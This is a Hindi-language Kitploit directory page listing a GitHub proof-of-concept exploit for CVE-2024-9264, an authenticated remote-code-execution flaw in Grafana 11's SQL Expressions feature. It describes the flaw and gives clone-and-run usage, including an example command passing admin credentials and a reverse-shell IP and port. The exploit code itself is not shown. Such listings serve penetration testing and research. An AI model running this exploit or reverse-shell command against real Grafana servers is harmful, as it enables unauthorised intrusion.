Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2024-9264 — Grafana (v11.0) में SQL Expressions के माध्यम से प्रमाणित RCE - PoC Exploit | Kitploit
उपकरण/GitHubGitHub/rvzsec/cve-2024-9264
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगकमांड एंड कंट्रोल
GitHubrvzsec/cve-2024-9264

CVE-2024-9264

Grafana (v11.0) में SQL Expressions के माध्यम से प्रमाणित RCE - PoC Exploit

रिपॉजिटरी देखें
221 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2024-9264

Grafana (v11.0) में SQL Expressions के माध्यम से प्रमाणित RCE - PoC Exploit



लोगो

CVE-2024-9264 - Grafana v11.0
प्रमाणित दूरस्थ कोड निष्पादन (RCE)

PoC


परिचय

CVE-2024-9264 एक गंभीर remote-code-execution और local-file-inclusion दोष है जो Grafana 11 के प्रायोगिक “SQL Expressions” सुविधा में पेश किया गया है। API उपयोगकर्ता द्वारा प्रदान किए गए SQL को बिना पर्याप्त स्वच्छता के सीधे DuckDB CLI को भेजता है, इसलिए Viewer या उच्च अधिकार वाला कोई भी प्रमाणित खाता शेल कमांड इंजेक्ट कर सकता है या मनमानी फ़ाइलें पढ़ सकता है, बशर्ते duckdb बाइनरी सर्वर के PATH में हो।


उपयोग

root@kitploit:~
git clone https://github.com/rvizx/CVE-2024-9264
cd CVE-2024-9264
chmod +x exploit.sh

# usage
usage: ./exploit.sh <grafana_url> <username> <password> <reverse_ip> <reverse_port>

उदाहरण:

root@kitploit:~
./exploit.sh http://grafana.example.com admin LMCOP4X2?29DX2%332! 10.10.10.10 1337
टूल डाउनलोड करें